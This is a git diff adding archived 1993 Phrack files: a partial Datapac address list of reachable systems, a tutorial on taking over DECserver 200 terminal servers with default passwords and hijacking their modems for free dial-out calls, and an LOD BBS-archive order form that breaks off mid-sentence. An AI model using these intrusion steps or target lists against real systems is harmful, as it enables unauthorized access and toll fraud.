+38500204           $        ""
+38500205           $        ""
+38500226             XMUX      node: (no node name)
+38500262             Please enter your operator number
+38500329             #
+38500356             PACX      CCINFO
+38500399             SERVICE ID=
+38500400             ::
+38500431             VAX/VMS
+38500586             VAX/VMS   MicroVMS v5.3
+38500891             VAX/VMS
+38500900           $ Datapac Public OD
+38500901           $        ""
+38501019             XMUX      node: WELLAND
+38501149             XMUX      node: CPNWRI
+38501151             VAX/VMS
+38501155             DATAPAC : BUR SYSTEM READY
+38501175             CDCNET
+38501194             VAX/VMS   AEG Electrocom CDN_CECO  V25.3
+38700015             VAX/VMS   BURCOM - MicroVAX ][ - MSB
+38700022             XMUX      node: RBURL
+38700048             PRIMOS    20.2.6 SYSD
+38700068           $ Bailey Controls Canada
+38700119             ::
+38700127             XMUX      node: STORE031
+38700132             XMUX      node: LIMRIDGE
+38700152             PRIMOS    20.2.6 SYSF
+38700153             PRIMOS    20.2.6 SYSL
+38700155             XGATE:
+38700162             XMUX      node: QUEENSTN
+38700261             XMUX      node: HAMILTON
+38700262             XMUX      node: FORTERIE
+38700426             XMUX      node: HAM
+38700583             XMUX      node: DISCNT2
+38700629             XMUX      node: NIAGARA
+39100017             MERLIN    SYSTEM 2
+39100019             MERLIN     ""
+39100020             MERLIN     ""
+39100041             Id:          LU:Z0068
+39100043             Id:          LU:Z0070
+39100044             Id:          LU:Z0077
+39100045             Id:          LU:Z0078
+39100049             Green Line Investor Services
+39100057             VAX/VMS   Burns Fry Analytics Inc. Fixed Income Research
+39100077             Toronto Public Library
+391000775            XMUX      node: TPL
+39100092             INT/UNIX  system name: cirus 2  INTERACTIVE SYSTEMS CORP.
+39100146             XMUX      node: STORE088
+39100200             iNet2000
+39100234             VAX/VMS   Burns Fry Ltd.  MicroVAX 3800
+39100395             HP3000
+39100498             STARMASTER
+39100503             MERLIN    SYSTEM 2
+39100566             STARMASTER     NORBORD Industries
+39100566             Console
+39100581             AOS/VS
+39400100             iNet2000
+39400101             iNet2000
+39500032             INFOGLOBE DATABASE--PLEASE SIGN ON
+39500032             Globe & Mail
+40100012             PACX      U.C.G.  PACX 2000
+41100043             Infoglobe
+41100045             Interactive UNIX
+41100054             Green Line Investor System
+41100065             Imprimerie Quebec
+41100301             Prime Net
+41100656             Lotus CSG
+41100681             ??
+43900170             ECHO System
+55500010             French?
+59100088             U Of A 3000 System
+59100092             Keyano College-Alberta
+59100099             VMS/VAX
+60100010             U of Alberta
+62400440             UNIX 2000 System
+62600009             Private Network
+62600045
+62600046             Service Id:
+66600062             Van-Reg
+66600180             ??
+67100752             User Name?
+67101408             ??
+67101700             Cloverdale Paint
+67101802             VMS/VAX
+69100018             CYBERSHARE
+69100376             VMS/VAX
+69200032             Lucky (VMS/VAX)
+69200239             Environment Winnepeg
+69200343             User Id:
+70300066             Brandon University
+72100315             SPMC (VMS/VAX)
+72100465             MCR
+72101002             VMS/VAX
+72101058             SPECIFY APPLICATION DESIRED
+72101109             Information System Management
+72400014             Max Daisley System (VMS/VAX)
+72400100             Envoy
+72400101             Envoy
+78100092             VMS/VAX
+78100209             VMS/VAX
+78100265             VMS/VAX
+78100476             Hewlett Packard System
+78100876             DYNIX S6000
+78101097             VMS/VAX
+79400100             Envoy
+84400095             Profits
+84400237             Service Id:
+84400312             GEnie Network
+84400513             SuperDOS
+84400526             BNF: DATAPAC SYSTEM READY
+84400571             Daily Oil & Associates BBS
+84800410             VMS/VAX
+84800535             CAS: DATAPAC
+84800700             VMS/VAX
+84800728             %XGATE
+84800784             XENIX System
+84800829             Alberta Wheat Pool
+84800888             ALLSTATE (VMS/VAX)
+91100014             Gandalf System - Canadian Facts
+91100174             VMS/VAX
+91100482             Grassroots System              (Special Emul. Needed)
+92100086             DATAPAC Information
+93200233             UM-Net
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
diff --git a/phrack44/22.txt b/phrack44/22.txt
new file mode 100644
index 0000000..df2f8c6
--- /dev/null
+++ b/phrack44/22.txt
@@ -0,0 +1,391 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 22 of 27
+
+****************************************************************************
+
+
+               -- An Introduction to the DECserver 200 --
+                     by Opticon The Disassembled
+
+
+ ANARCHY: "The belief that society
+ can be maintained without prisons,
+ armies, police or other organized force to
+ maintain property rights, collect taxes or
+ enforce such personal obligations as debts,
+ contracts or alimony." -EB 1966, vol.I
+ (taken from the Phrozen Realm)
+
+
+ "If ur good, nobody knows that ur there"
+
+    The DECserver is a terminal server (WOW!).  The Model 200 is the most
+commonly found server in VMS machines.  This device connects up to eight
+asynchronous (RS232C) terminals to one or more hosts available on an Ethernet
+Local Area Network.
+
+    It is connected to the LAN through an Ethernet physical channel and
+supports speeds up to 19.200bps.  It can be found on VAXes, mVAXes and
+VAXstations.  It uses the Local Area Transport protocol to communicate with
+the other nodes.  It also implements the Terminal Device/Session Management
+Protocol to achieve multiple sessions.  Things that can be found plugged on
+it include dial-in and out modems, terminals, printers and stuff like that.
+The identification code for it in VMS is DS2.  It's software is installed
+via VMSINSTAL.COM to SYS$SYSROOT:[DECSERVER] or in SYS$COMMON:[DECSERVER]
+for the cluster machines.  And of course now you will ask why should you
+be interested in a damn phucking (=relief, back to my native language) SERVER.
+A lot of interesting things can be done, like dialing out for free (assuming
+you can connect to it in a convenient way).  You can even find a DEC server
+200 dedicated to eight high speed modems.  There is no need to say that you
+need privileges to phuck up with devices like that...or there is?
+
+..Set Default to SYS$SYSROOT:[DECSERVER] and run DSVCONFIG.COM :
+
+$
+$ set default sys$sysroot:[decserver]
+$ show default
+  SYS$SYSROOT:[DECSERVER]
+  =   SYS$SYSROOT:[DECSERVER]
+  =   SYS$COMMON:[DECSERVER]
+$ @dsvconfig
+
+    You must assign a unique DECnet node name and DECnet node
+address for each new DECserver.
+
+Press <RET> to start, or <CTRL/Z> to exit...
+
+      D E C s e r v e r   C o n f i g u r a t i o n   P r o c e d u r e
+
+                                                      Version: V1.7
+
+                               Menu of Options
+
+                       1 - List known DECservers
+                       2 - Add a DECserver
+                       3 - Swap an existing DECserver
+                       4 - Delete an existing DECserver
+                       5 - Restore existing DECservers
+                  CTRL/Z - Exit from this procedure
+
+        Your selection? 1
+
+DECnet  DECnet Server Service
+Address Name   Type   Circuit  Ethernet Address   Load File      Dump File
+------- ------ -----  -------  -----------------  -------------  -------------
+ 1.1    KEYWAY DS200  BNA-0    08-00-2B-07-39-5E  PR0801ENG.SYS  DS2KEYWAY.DMP
+ 1.2    REVEAL DS200  BNA-0    08-00-2B-28-32-CB  PR0801ENG.SYS  DS2REVEAL.DMP
+ 1.3    OASIS  DS200  BNA-0    08-00-2B-26-A9-57  PR0801ENG.SYS  DS2OASIS.DMP
+ 1.4    PAWN   DS200  BNA-0    08-00-2B-24-F3-98  PR0801ENG.SYS  DS2PAWN.DMP
+ 1.5    OPAQUE DS200  BNA-0    08-00-2B-11-EA-D4  PR0801ENG.SYS  DS2OPAQUE.DMP
+ 1.6    TOKEN  DS200  BNA-0    08-00-2B-10-64-98  PR0801ENG.SYS  DS2TOKEN.DMP
+ 1.7    KERNEL DS200  BNA-0    08-00-2B-12-D6-39  PR0801ENG.SYS  DS2KERNEL.DMP
+ 1.8    IRIS   DS200  BNA-0    08-00-2B-12-D6-39  PR0801ENG.SYS  DS2IRIS.DMP
+ 1.9    NEBULA DS200  BNA-0    08-00-2B-12-D6-39  PR0801ENG.SYS  DS2NEBULA.DMP
+
+Total of 9 DECservers defined.
+(Press RETURN for menu)
+
+Connecting to one of them:
+
+$ mc ncp connect node iris
+
+Console connected (press CTRL/D when finished)
+#
+
+
+     Here you must give a password.  The default one is usually working so try
+"access".  Only in "high security" systems they change the default password,
+because privileges are needed anyway to access the Network Control Program
+(which can be a possible subject for my next article).  But since you are in
+using a system account (..privileged) you can change the current password if
+you find any good reason for doing so.  More on that later.
+
+DECserver 200 Terminal Server V3.0 (BL33) - LAT V5.1
+
+Please type HELP if you need assistance
+
+Enter username> <type anything here it doesnt really matter>
+
+
+ You are in.
+
+    In the DECserver there are Permanent and Operational databases.  The
+permanent database holds commands which affect the device permanently when
+you log out.  In the Operational database whatever you do is temporary and
+takes effect only for the time you are logged in.
+
+    Let's go on by trying to get the default privileged account which enables
+you to view various things and make changes other than the normal ones.
+
+Local> set privileged
+Password> system
+
+    Again the default password should work.
+
+Local> show hosts
+
+Service Name        Status       Identification
+
+VMS               1 Connected    Welcome to VAX/VMS V5.4-2
+MODEM               Available    Dial In And Out
+UNIX                Available    BSD
+
+Local> show nodes
+
+Node Name           Status       Identification
+
+VMS               1 Connected    Welcome to VAX/VMS V5.4-2
+UNIX                Reachable    BSD
+IRIS                Reachable
+
+Local> show services
+
+Service Name        Status       Identification
+
+VMS               1 Connected   Welcome to VAX/VMS V5.4-2
+MODEM               Available    Dial In And Out
+UNIX                Available    BSD (RISC)
+
+Local> show users
+
+Port    Username             Status          Service
+
+  1     anything             Connected       VMS
+
+Local> show sessions (it'll display YOUR sessions)
+
+Port 1:  anything            Local Mode    Current Session: None
+
+
+** Before proceeding lets have a better look at some Features DECserver 200
+has, needed to understand some interesting things which follow or even some
+things that were previously mentioned.
+
+    Remote Console Facility (RCF) is a management tool which helps you to
+connect remotely to any server available via it's management port.  This
+is not hardware, but a logical port although it still has the same
+characteristics physical ports have.
+
+    There are Privileged, non-Privileged and Secured ports.  These are
+variables you can define by the time you manage to get the privileged account.
+A privileged port accepts all server commands.  You can perform tests, define
+server operations, maintain security and all that bullshit.  If you don't
+understand it yet, this status is enabled with the SET PRIVILEGED command we
+have used previously.
+
+    A non-Privileged port can only manage and use commands which affect the
+sessions that are currently connected to a host or node.  This is the default
+status of course.
+
+    A Secured port is something in between.  Users can make use of a restricted
+command set to make changes which affect only the port they own ("Property
+is theft but theft is property too, Prounton."  Pardon me if the translation
+was destructive to the original meaning of this phrase, and if I piss you off
+every time I start talking about things that are completely irrelevant
+to the grand scheme of things and everything my articles are SUPPOSED
+to deal with).
+
+    Our little unit has 5 types of passwords and that will help you understand
+how important it is for the whole system.
+
+    (1) A PRIVILEGED password is what you should be aware of by now.  You can
+SET/DEFINE SERVER PRIVILEGED PASSWORD "string", to change it.
+
+    (2) A LOGIN password prevents the use of the server by unauthorized
+users.  This can be enabled for every port or for a single dial-in modem port.
+You must first specify the password for the entire server via SET/DEFINE
+SERVER LOGIN PASSWORD and then, enable or disable it depending on the needs
+of a specified port, via SET/DEFINE PORT x LOGIN PASSWORD ENABLED/DISABLED.
+This password takes effect when you try to login to a port.  The prompt is
+a "#" sign, without the double quotes.
+
+    (3) A MAINTENANCE password prevents unauthorized users from doing remote
+maintenance operations like the one we did after we ran DSVCONFIG.COM.
+"The DECnet service password corresponds to the server maintenance password
+and it is entirely unrelated with the DECserver 200 service password".  In
+other words someone who wishes to modify a value in your server must give
+in the NCP> command line, a parameter which specifies your server's
+maintenance password.  Of course if this password is set to null (0)
+no password is needed.  Also "Digital Equipment Corporation recommends
+against storing the password in the DECnet database (as the DECnet service
+password) and it strongly suggests that you change the maintenance password
+from the default value of 0 to maintain adequate server security"
+...tsk tsk tsk...
+
+    (4) A SERVICE password protects a service or services defined on the
+server.  You can increase or decrease the number of attempts before the server
+gives a message, informing that the connect has failed because of an invalid
+password, via SET/DEFINE SERVER PASSWORD LIMIT.
+
+    (5) A LOCK password protects your current sessions and port from other
+unwanted human substances.  The server accepts no input until you retype the
+password you used for locking it.
+
+    Finally, a port may be available only for certain users or groups.
+
+** As you can see, it can be really tough to break VMS' security if all the
+available measures are taken.
+
+Research for modems:
+
+Local> show port 8
+
+Port 8:                                Server: IRIS
+
+Character Size:            8           Input Speed:        19200
+Flow Control:            XON           Output Speed:       19200
+Parity:                 None           Modem Control:   Disabled
+
+Access:                Local           Local Switch:       None
+Backwards Switch:       None           Name:             PORT_8
+Break:                 Local           Session Limit:         4
+Forwards Switch:        None           Type:               Soft
+
+Preferred Service: None
+
+Authorized Groups:   0
+(Current)  Groups:   0
+
+Enabled Characteristics:
+
+Autobaud, Autoprompt, Broadcast, Input Flow Control, Loss Notification,
+Message Codes, Output Flow Control, Verification
+
+    Simple configuration, probably nothing or a terminal in there.  What this
+screen says is that we have on server IRIS, on port 8, something with character
+size of 8, flow control XON (it could be CTS -hardware-), parity none, input
+speed 19200bps, output speed 19200bps and modem control disabled.
+
+    All the other information have to do with the server and how it reacts to
+certain things.  So if the preferred service was "VMS" and you were logging in
+through port 8, you would immediately connect to the VAX without having the
+server asking you where to log you to.  The "break: Local" variable means that
+if you send a break character you will find yourself in the "Local>" prompt even
+if you have been working in the UNIX OS of the "UNIX" host and that lets you
+start multiple sessions.  Quite useful.  The forward and backward switches are
+for moving around your sessions.  Everything can be modified.
+
+    For more information concerning the parameters have a look at the command
+reference or the help utility.
+
+Local> show port 1
+
+Port 1:                                Server: IRIS
+
+Character Size:            8           Primary Speed:      9600
+Flow Control:            CTS           Alternate Speed:    2400
+Parity:                 None           Modem Control:   Enabled
+
+Access:              Dynamic           Local Switch:       None
+Backwards Switch:       None           Name:            MODEM_1
+Break:                 Local           Session Limit:         4
+Forwards Switch:        None           Type:               Soft
+
+Preferred Service: VMS
+
+Authorized Groups:   0
+(Current)  Groups:   0
+
+Enabled Characteristics:
+
+Autobaud, Autoconnect, Autoprompt, Broadcast, Dialup, DTRwait,
+Inactivity Logout, Input Flow Control, Loss Notification,
+Message Codes, Output Flow Control, Ring, Security, Verification
+
+
+    And that's, obviously, a modem.  The speed, the modem control and the enabled
+characteristics will help you understand even if the name is not helping at
+all.  Have a look at the "Alternative Speed" option.
+
+    What to do now that you have find it?
+
+Local> set port 1 modem control disabled
+Local> set service modem port 1
+Local> connect modem
+
+
+    Start programming.  This way is a little bit awkward and of course there
+is a possibility that the modem is ALREADY defined as a dial-out modem.  You
+are a privileged user, don't forget that.  I would recommend not to harm the
+server ("nothing comes from violence and nothing ever good") and to leave
+things as u find them.  DO NOT create a permanent dial-out modem service
+(which can be done directly from VMS if you really want to) and DO NOT
+forget that somebody has to pay for your calls and that the line which
+the modem uses, may be limited to certain numbers or even prevent out-dialing
+by hardware.  Use your brains...And don't stick in the idea of researching
+modems.  You can use a DECserver to infiltrate a system.  Don't misuse those
+introductions.
+
+    Overview of Commands (in alphabetical order)
+
+     *  BACKWARDS
+         Goes back to a previous session.
+     *  BROADCAST
+         Sends a message to a port.
+     *  CLEAR
+         Clears a service.  It belongs to the Operational Database.
+     *  CONNECT
+         Connects to a service or port.
+     *  CRASH
+         Shuts down the server and reinitializes it.
+     *  DEFINE
+         Defines something.  It belongs to the Permanent Database.
+     *  DISCONNECT
+         Disconnects a session or port.
+     *  FORWARD
+         Goes forward to a following session.
+     *  HELP
+         Help.
+     *  INITIALIZE
+         Reboots the server.  You can specify a delay in minutes and
+         "Local>initialize cancel" if you decide, finally, not to
+         do it.
+     *  LIST
+         Displays information on something; Devices,Nodes,Ports,Queue,
+         Server, Services, Sessions...
+     *  LOCK
+         Locks your terminal with a password you specify that moment.
+         Retype your temporary password to continue.
+     *  LOGOUT
+         Logs out the specified port.  If none, your current port.
+     *  MONITOR
+         Devices, Nodes, Ports, Queue, Server, Services, Sessions...
+     *  PURGE
+         Purges a service from the Permanent database.
+     *  RESUME
+         Resumes a session.
+     *  SET
+         Devices, Nodes, Ports, Queue, Server, Services, Sessions,
+         Characteristics,Privileged,NONprivileged...It belongs to the
+         Operational database.
+     *  SHOW
+         Everything.
+     *  TEST
+         Tests a LOOP, PORT or SERVICE.
+
+    An interesting Warning Message, just for informational purposes, is the
+following;
+
+      " Local -120- WARNING - Access to service is not secure
+
+        Session status information cannot be passed between the
+        server and the attached device because modem signals are
+        not present.  This is not a problem if the device is a
+        non-secure printer; however, if the port is a non-LAT
+        host system, users could access other users' data. "
+
+    That's all for now I think.
+
+    There are many things to explain but there is no reason for doing that right
+now.  If you need more information then just have a look at the HELP utility or
+contact me, somehow.  [I hope you have not misunderstood my strange looking
+article because my native language is not English]
+
+
+    " Opticon: Don't you think that I'm getting insane?
+      TLA: Yeah, sure looks like it..."
+
+    Love and An-archy to all those who know why.
+
+ BREAK DOWN THE WALL
diff --git a/phrack44/23.txt b/phrack44/23.txt
new file mode 100644
index 0000000..f40b7bf
--- /dev/null
+++ b/phrack44/23.txt
@@ -0,0 +1,570 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 23 of 27
+
+****************************************************************************
+
+      The LOD Communications Underground H/P BBS Message Base Project:
+             Information and Order Form File Version #2, 7/30/93
+ 
+ 
+   This file contains:
+ 
+     - Background information on the project;
+     - Excerpts from Computer underground Digest (CuD) Issue #5.39;
+     - UPDATED FAQ AND PRICING; and,
+     - UPDATED Order form and stipulations.
+ 
+   This is an update of Version #1 of this file.  A change in pricing
+structure (to your benefit) has been made along with some additions to the
+FAQ among other things. All sections that have been changed/updated are
+bordered by 3 asterisks (*** ___ ***).  Please take the time to read through
+the updates.  Sections without asterisks have not been changed and are
+essentially the same as in Version #1. This file is approximately ten pages
+in length (28K) and should answer all of your questions.
+ 
+ 
+The Project:
+------------
+ 
+   Throughout history, physical objects have been preserved for posterity for
+the benefit of the next generation of humans.  Cyberspace, however, isn't very
+physical; data contained on floppy diskettes has a finite lifetime as does the
+technology to retrieve that data.  The earliest underground hacker bulletin
+board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s
+were state-of-the-art.  Today, it is difficult to find anyone who has one of
+these machines in operating condition, not to mention the brain cells left to
+recall how to operate them. :-(
+ 
+   LOD Communications has created a historical library of the "dark" portion of
+Cyberspace.  The project's goal is to acquire as much information as possible
+from underground Hack/Phreak (H/P) bulletin boards that were in operation
+during a decade long period, dating from the beginnings (in 1980/81 with 8BBS
+and MOM:  Modem Over Manhattan) to the legendary OSUNY, Plover-NET, Legion of
+Doom!, Metal Shop, etc. up through the Phoenix Project circa 1989/90. 
+Currently, messages from over 50 different BBSes have been retrieved, although
+very few message bases are 100% complete.  However, not having a complete "set"
+does not diminish their value.
+ 
+ 
+Who Benefits From This Information?:
+------------------------------------
+ 
+     - PARTICIPANTS who were on the various H/P BBSes may want to see their
+       contribution to history or reminisce about the "golden era" of hacking;
+ 
+     - ENTHUSIASTS who came into the "scene" after most of these boards were
+       down may want to see what they missed;
+ 
+     - COMPANIES who may want to see if their (or their competitors') phone
+       systems, computers, or networks were compromised;
+ 
+     - SECURITY PROFESSIONALS/LAW ENFORCEMENT who may want to see what
+       techniques were used to subvert computer security systems;
+ 
+     - SCHOOLS AND UNIVERSITIES (including their libraries) who may want to
+       use the information for research in sociology or computer science as
+       well as for educational purposes in courses such as Computer Law,
+       Computer Ethics, and Computer Security;
+ 
+     - AUTHORS/PRESS who may want to finally get the facts straight about
+       "hackers"; and,
+ 
+     - THE CURIOUS PUBLIC who may want to sneak a peek into the inner realm of
+       the Computer Underground, especially those Restricted Access BBSes and
+       their Private sub-boards where only a small handful of "the best"
+       resided.
+ 
+   Were the individuals involved in the Computer Underground out to start World
+War III, selling secrets to the Soviets, working with organized crime,
+conspiring to do evil, or just a bunch of bored teenagers with nothing better
+to do?  How much did they know, and how did they find it out?  Did they have
+the capability to shut down phone service of Area Code portions?  Could
+they ruin someone's credit?  Could they "move satellites in the heavens?" 
+Could they monitor packet switching network conversations or YOUR
+conversations?  The answers lie within the messages themselves.
+ 
+ 
+*** Why is LODCOM Charging Money For The Message Bases?: ***
+------------------------------------------------------------
+ 
+   As happens with most projects, the effort and monetary investment turned
+out to be substantially more than originally anticipated.  With all of the
+high-tech equipment available today, people sometimes forget that in the early
+1980s, 14.4K baud modems and 250 MB hard drives were just a fantasy for the
+home computer user.  Most messages Lodcom has recovered were downloaded at 300
+baud onto 143K disk drives, with each file usually no larger than 15K in size. 
+One could not call a BBS and download the complete message base in 10 minutes
+and save it into one file.  Literally hundreds of man-hours have been spent
+copying dusty Apple ][ disks, transferring them to IBM (or typing in hard
+copy versions when electronic versions were unavailable), organizing over one
+thousand individual files (thus far) according to what BBS the messages were
+originally posted on, and splicing the files together.  Also, after consulting
+with the appropriate civil liberties organizations and our own legal counsel,
+a slight editing of the messages (restricted to long distance access codes,
+phone numbers, and computer passwords) had to be made to ensure that there is
+nothing illegal contained within the messages.  Every effort was made to keep
+the messages in their pristine condition:  40 columns, ALL CAPS, spelling
+errors, offensive language, inaccuracies of various kinds, and ALL.
+ 
+   Although a fairly comprehensive collection of the goings-on during a decade
+of public and private computer underground activity has been accomplished,
+there are more messages out there.  It is our wish to continue to document the
+History of the Computer Underground.  In order to do this, and in order to
+break even on what resources have already been expended (it is a LOT more than
+most people realize), a dollar value has been attached to the entire
+compilation of message bases (ie, all Volumes combined).  Without your
+understanding and support, this effort may not be able to sustain itself long
+enough to complete the project.  A large portion of any profits will be
+recycled for two other projects in the works, whose aim is to provide
+additional historical background on the Computer Underground Community.  That
+is, no one involved is quitting their day job :-)
+ 
+  DONATIONS: A portion of every order will be donated to the following causes:
+ 
+             1) A donation will be made to help pay for Craig Neidorf's
+                (Knight Lightning - Metal Shop Private Co-Sysop) Legal Defense
+                bills (resulting from his successful campaign to protect First
+                Amendment rights for electronic publishing, i.e. the
+                PHRACK/E911 case).
+ 
+             2) The SotMESC Scholarship Fund.  The SotMESC Scholarship is
+                awarded to students writing exceptional papers of 20 to 30
+                pages on a topic based on computer culture (ie, hacking
+                culture, virus writing culture, Internet culture, etc.) For
+                more details write: SotMESC  PO BOX 573  Long Beach, MS 39560
+                or email: rejones@seabass.st.usm.edu
+ 
+ 
+What Each "Message Base File" Contains:
+---------------------------------------
+ 
+     - A two page general message explaining H/P BBS terminology and format.
+ 
+     - The BBS Pro-Phile:  A historical background and description of the BBS
+       either written by the original system operator(s) or those who actually
+       called the BBS when it was in operation (it took months to track the
+       appropriate people down and get them to write these specifically for
+       this project; lesser known BBSes may not contain a Pro-Phile);
+ 
+     - Messages posted to the BBS (i.e. the Message Base);
+ 
+     - Downloaded Userlists if available; and
+ 
+     - Hacking tutorials a.k.a. "G-Philes" that were on-line if available.
+ 
+   It is anticipated that most people who are interested in the message bases
+have never heard of a lot of the BBS names shown in the listing.  If you have
+seen one set of messages, you have NOT seen them ALL.  Each system had a
+unique personality, set of users, and each has something different to offer. 
+ 
+ 
+Formats the Message Base Files are Available in:
+------------------------------------------------
+ 
+   Due to the large size of the Message Base Files, they will be compressed
+using the format of your choice.  Please note that Lodcom does NOT include the
+compression/uncompression program (PKZIP, PAK, etc.).  ASCII (uncompressed)
+files will be provided for $5.00 extra to cover additional diskette (files
+that are uncompressed require more than double the number of diskettes) and
+shipping costs.  The files are available for:
+ 
+     - IBM (5.25 or 3.5 inch)
+     - AMIGA (3.5 inch)
+     - APPLE MACINTOSH (3.5 inch)
+     - PAPER versions can be ordered but cost triple (due to increased shipping
+       costs, time to print order, and messages being in 40 column format and
+       therefore wasting lots of paper...save those trees!).  Paper versions
+       take twice the time to deliver but are laser printed.
+ 
+Orders are expected to arrive at the requesters' physical mail box in 3-5
+weeks upon receipt of the order.
+ 
+ 
+*** FAQs (Frequently Asked Questions): ***
+------------------------------------------
+ 
+  QUESTION:  In VERSION #1 of this file a minimum order size of $20.00 was
+             required but I don't see that in this version.  Also all the
+             individual Message Bases had a price.  Why the change?
+ 
+   ANSWER: After disseminating the first version of this information file, we
+           received a very good response as far as orders are concerned. Since
+           our goal is to recoup the expenses incurred (and still incurring)
+           on this project rather than 'fleece the masses' it was decided to
+           lower the overall price which translates to offering more files for
+           the same old price.  That is, you will receive ALL Volumes of this
+           project for $39.00 rather than just the 1st Volume as was mentioned
+           in the last release of this information file. As for the minimum
+           order ($20.00), since EVERYONE who has thus far ordered the Message
+           Bases ordered the complete volume (was Volume #1 only, now it's all
+           volumes) rather than individual message bases, we decided to do
+           away with individual Message Base pricing due to lack of demand.
+ 
+  QUESTION:  How many Volumes will Lodcom be releasing?
+ 
+   ANSWER: Three Volumes minimum, possibly a fourth if additional material
+           is obtained.  There are still a few contributors who have material 
+           that hasn't been sent to us yet.  The expected release of future
+           Volumes are:
+ 
+                       Volume 1: 5700+ Messages, 20 H/P BBSes, COMPLETED.
+                       Volume 2: 15-25 H/P BBSes, September 1993.
+                       Volume 3: 15-25 H/P BBSes, November 1993.
+                       Volume 4: If there is one, End of December 1993.
+                       All in all there is expected to be 15000+ Messages.
+ 
+  QUESTION:  How long will these Message Base Files be available?
+ 
+   ANSWER: We cannot say for sure.  This is an ongoing effort and your support
+           will allow us to continue until we are satisfied with having
+           recovered the last decent scraps of messages out there.  Assuming
+           there is a demand for these messages, all H/P BBSes of WORTH (i.e.
+           NON-"codez" and NON-"warez" systems) are expected to be offered by
+           the end of this year (1993).  A Guesstimate of what will be
+           offered is 60 to 80 Message Bases, half of which will be rather
+           partial.  Orders are expected to be filled at least into the
+           beginning of next year (1994) although this may change. Regardless,
+           we will send out notification well in advance of ceasing operations.
+ 
+  QUESTION:  I ordered Volume #1 already, is your new pricing retroactive?
+ 
+   ANSWER: Yes.  If you have already ordered Volume #1, when the next Volume
+           is completed it will be sent out to you without any action on your
+           part.  If you change mailing addresses be sure to notify us.  Think
+           of this as a Subscription of sorts.  Order now and all completed
+           Volumes will be sent to you.  When another Volume is finished it
+           will be sent out automatically.  If it wasn't for all of you who
+           have already ordered and showed your support, we would not be able
+           to offer ALL the Volumes for what you paid for the first Volume.
+ 
+  QUESTION:  What if lodcom obtains more messages from a BBS or BBSes after 
+             a Volume has been shipped to me, will I get those messages also?
+ 
+   ANSWER:  Yes. Any additional messages to a H/P BBS that we obtain after
+            shipping that BBS file to you will be sent to you either via email
+            or via snail mail on another diskette.
+ 
+  QUESTION:  I would really like to get a feel for what a few of the
+             boards were like before I order them.  Can I get more info?
+ 
+   ANSWER: Yes.  A Sample of actual messages is available by performing the
+           following, so long as you have TELNET access to the Internet:
+ 
+           Telnet to:  phantom.com  (or)  198.67.3.2
+           Type:       mindvox         [To enter the Mindvox system]
+           login as:   guest           [To look around]
+           At prompt:  finger lodcom   [To see our Sample Messages File]
+ 
+   If you do not have TELNET access to the Internet, AND your host will NOT
+"bounce" a 50K file, Lodcom will send you the Sample Messages File if you
+specifically request it. The file has 31 fairly typical messages from Five
+H/P BBSes that operated between 1983 and 1989.
+ 
+  QUESTION:  "Can I help out?  I have some old messages" (either on a C64,
+             Apple, IBM [best for us], or printout).
+ 
+   ANSWER: Contact us ASAP!  We will work out an equitable agreement depending
+           on the quantity, quality, format, and "ancientness" of the
+           messages.  Your contribution will not go unrecognized.
+ 
+  QUESTION:  I would like another person's point of view on this project
+             before I decide to order.  Where can I get more information?
+ 
+   ANSWER: See the following excerpt from Cud #5.39.  We also list where you
+           can get the original CuD issue which also includes an interview and
+           some BBS Pro-philes.
+ 
+ 
+*** CuD Excerpts: ***
+---------------------
+ 
+Computer underground Digest    Sun May 30 1993   Volume 5 : Issue 39
+                           ISSN  1004-042X
+ 
+       Editors: Jim Thomas and Gordon Meyer (TK0JUT2@NIU.BITNET)
+ 
+CONTENTS, #5.39 (May 30 1993)
+File 1--The LOD Files - A CuD Critique
+File 2--Histories of BBSes (excerpts from the LOD files)
+File 3--LOD Project Summary and Contact Information
+File 4--An Interview with the LOD
+ 
+Cu-Digest is a weekly electronic journal/newsletter.
+Issues of CuD can be found in the Usenet comp.society.cu-digest news group.
+U.S. Anonymous FTP:  ftp.eff.org (192.88.144.4) in /pub/cud directory.
+Back issues may be obtained through mailserver at: server@blackwlf.mese.com
+ 
+*** {The following excerpts are from CuD #5.39 File 1, CuD's Critique} ***
+ 
+"...Lest there be any confusion, there remains only one LOD, most of its
+original members are in periodic contact, they have long since become
+adults, and there is no relationship between the original LOD and any
+recent individuals or groups claiming the name.
+ 
+But who really cares??
+ 
+CuD, for one cares. The original LOD remains a cultural icon of the
+1980s in computer culture, and--for better or worse--it was the most
+influential and imitated group whose mystique continues into the
+mid-90s. This alone is hardly sufficient reason to worry about a
+label. The identity is important because the original members are
+becoming involved in projects that reflects their activities of a
+decade ago, and it becomes confusing when others scurry about trying
+to associate with that identity.  If questions of identity arise,
+confusion over and doubts about the credibility of the projects arise.
+ 
+One current LOD project has impressed us. The original LOD members are
+compiling logs from a number of the premier "hacker underground BBSes"
+of the 1980s.  We have obtained excerpts from the project, and we are
+impressed with the professionalism and comprehensiveness of the material.
+ 
+Working collectively under the name "LOD Communications," former members have
+scoured their archive for BBS logs from the mid-to-late 1980s. The logs
+include BBSes such as OSUNY, Twilight Zone, Forgotten Realm, Black Ice
+Private, Phoenix Project, Face to Face, Alliance, and Plover-NET, among
+others. Many were the primary boards of the era, and others typify secondary
+levels of the culture. Both singly and in the aggregate, the collection
+provides an unprecedented view into a culture that most of us only read about
+in "Cyberpunk" or "The Hacker Crackdown."
+ 
+We like the material for several reasons. First, as researchers, we find even
+the limited material we have seen to date as a rich source of data for anybody
+who wants to understand the culture of time. It is as if somebody had walked
+though San Francisco's Haight-Ashbury district with a video-cam during the
+"Summer of Love" and then released the tapes years later. It's an
+anthropologists dream, a sociologists data trove, and a historian's archival
+orgasm. Even law enforcement and security personnel would find it helpful for
+demystifying many of the misconceptions of "hackers." For others, it's
+simply fun reading.
+ 
+The logs are sufficiently entertaining and useful when each board is
+read individually. However, the power of the collection comes in
+reading them as chapters in a novel, as segments at different points
+in time that combine to give the individual posters and the boards a
+personality. We find ourselves wanting to know more about some of
+these people: How did they resolve their problems? Who was the alleged
+informant on a given board? Can we spot them from the posts? How did
+that poster resolve his problems?  What happened to these people later?
+ 
+Many of the logs' posts are flattering, others are less so. To their credit,
+the lodcom editors have left it all intact to let the readers see and judge
+for themselves what occurred on the underground boards. The LOD collection
+provides an authentic look into what went on, and reading them gave us a
